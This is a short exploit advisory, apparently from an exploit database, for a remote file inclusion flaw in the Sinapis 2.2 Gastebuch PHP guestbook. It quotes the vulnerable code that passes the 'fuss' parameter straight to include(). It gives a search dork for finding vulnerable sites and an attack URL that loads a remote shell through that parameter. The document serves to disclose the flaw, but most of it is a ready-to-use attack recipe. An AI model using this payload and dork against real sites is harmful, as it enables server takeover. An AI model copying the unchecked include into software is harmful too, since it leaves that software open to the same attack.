id: 1536
date: 02/23/2007
title: Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability
author: kezzap66345
cves: 

=========================================================================
Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability
=========================================================================




Sinapis 2.2 Gastebuch

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=gb&title=Sinapis%20G?stebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="inurl:sinagb.php"
*****************
ERROR:

if($fuss == ""){
echo "</body></html>";}
else{
include($fuss);}       <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path//sinagb.php?fuss=[SHELL]


******thanx=x0r0n*str0ke*shika********************************************************




#  0day.today [2023-03-21]  #